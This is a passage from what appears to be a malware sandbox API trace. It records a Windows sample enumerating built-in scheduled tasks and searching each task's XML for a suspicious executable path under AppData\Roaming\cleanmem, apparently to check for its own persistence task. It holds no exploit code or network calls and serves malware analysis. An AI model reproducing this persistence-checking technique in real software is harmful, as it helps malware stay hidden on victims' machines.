\r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n") returned 0x0 [0139.007] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.007] IUnknown:Release (This=0x127130) returned 0x0 [0139.007] IUnknown:Release (This=0x126fe0) returned 0x0 [0139.007] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0139.008] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.008] IUnknown:Release (This=0x126fe0) returned 0x0 [0139.008] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.008] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0139.009] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0139.010] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.010] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127120) returned 0x0 [0139.010] IRegisteredTask:get_Name (in: This=0x127120, pName=0x24da80 | out: pName=0x24da80*="LPRemove") returned 0x0 [0139.010] IRegisteredTask:get_Xml (in: This=0x127120, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0139.013] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.013] IUnknown:Release (This=0x127120) returned 0x0 [0139.013] IUnknown:Release (This=0x126fe0) returned 0x0 [0139.013] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0139.014] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.014] IUnknown:Release (This=0x126fe0) returned 0x0 [0139.014] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.014] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0139.014] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0139.023] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.023] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0139.023] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="SystemSoundsService") returned 0x0 [0139.023] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0139.025] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.025] IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.025] IUnknown:Release (This=0x126ff0) returned 0x0 [0139.025] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0139.027] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.027] IUnknown:Release (This=0x126ff0) returned 0x0 [0139.027] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.027] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0139.027] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0139.029] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.029] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0139.029] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="GatherNetworkInfo") returned 0x0 [0139.029] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0139.031] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.031] IUnknown:Release (This=0x127130) returned 0x0 [0139.031] IUnknown:Release (This=0x126fe0) returned 0x0 [0139.031] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0139.032] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.032] IUnknown:Release (This=0x126fe0) returned 0x0 [0139.032] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.032] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0139.032] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x127000) returned 0x0 [0139.033] IRegisteredTaskCollection:get_Count (in: This=0x127000, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0139.034] IUnknown:Release (This=0x127000) returned 0x0 [0139.034] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x127000) returned 0x0 [0139.035] ITaskFolderCollection:get_Count (in: This=0x127000, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.035] IUnknown:Release (This=0x127000) returned 0x0 [0139.035] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.035] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0139.035] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0139.037] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0139.037] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0139.037] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="Background Synchronization") returned 0x0 [0139.037] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0139.040] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.041] IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.041] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0139.041] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="Logon Synchronization") returned 0x0 [0139.041] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0139.043] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.043] IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.043] IUnknown:Release (This=0x126ff0) returned 0x0 [0139.044] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x12b5a0) returned 0x0 [0139.045] ITaskFolderCollection:get_Count (in: This=0x12b5a0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.045] IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.045] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0139.045] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.045] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fa0) returned 0x0 [0139.047] IRegisteredTaskCollection:get_Count (in: This=0x126fa0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.047] IRegisteredTaskCollection:get_Item (in: This=0x126fa0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0139.047] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="BackgroundConfigSurveyor") returned 0x0 [0139.047] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n") returned 0x0 [0139.049] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.050] IUnknown:Release (This=0x1270d0) returned 0x0 [0139.050] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.050] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fa0) returned 0x0 [0139.051] ITaskFolderCollection:get_Count (in: This=0x126fa0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.051] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.051] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.051] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.051] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.052] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0139.052] IUnknown:Release (This=0x126f90) returned 0x0 [0139.052] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.054] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=1) returned 0x0 [0139.054] ITaskFolderCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24da60 | out: ppFolder=0x24da60*=0x1270c0) returned 0x0 [0139.054] ITaskFolder:GetTasks (in: This=0x1270c0, flags=1, ppTasks=0x24d8e0 | out: ppTasks=0x24d8e0*=0x12d610) returned 0x0 [0139.055] IRegisteredTaskCollection:get_Count (in: This=0x12d610, pCount=0x24da40 | out: pCount=0x24da40*=0) returned 0x0 [0139.055] IUnknown:Release (This=0x12d610) returned 0x0 [0139.055] ITaskFolder:GetFolders (in: This=0x1270c0, flags=0, ppFolders=0x24d8e8 | out: ppFolders=0x24d8e8*=0x12d610) returned 0x0 [0139.056] ITaskFolderCollection:get_Count (in: This=0x12d610, pCount=0x24da58 | out: pCount=0x24da58*=0) returned 0x0 [0139.056] IUnknown:Release (This=0x12d610) returned 0x0 [0139.056] TaskScheduler:IUnknown:Release (This=0x1270c0) returned 0x0 [0139.056] IUnknown:Release (This=0x126f90) returned 0x0 [0139.056] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.056] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.056] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fc0) returned 0x0 [0139.058] IRegisteredTaskCollection:get_Count (in: This=0x126fc0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.058] IRegisteredTaskCollection:get_Item (in: This=0x126fc0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127110) returned 0x0 [0139.058] IRegisteredTask:get_Name (in: This=0x127110, pName=0x24da80 | out: pName=0x24da80*="AnalyzeSystem") returned 0x0 [0139.058] IRegisteredTask:get_Xml (in: This=0x127110, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n") returned 0x0 [0139.060] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.060] IUnknown:Release (This=0x127110) returned 0x0 [0139.060] IUnknown:Release (This=0x126fc0) returned 0x0 [0139.060] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fc0) returned 0x0 [0139.061] ITaskFolderCollection:get_Count (in: This=0x126fc0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.061] IUnknown:Release (This=0x126fc0) returned 0x0 [0139.061] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.061] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.061] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.067] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.067] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0139.067] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="RacTask") returned 0x0 [0139.067] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n") returned 0x0 [0139.081] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n 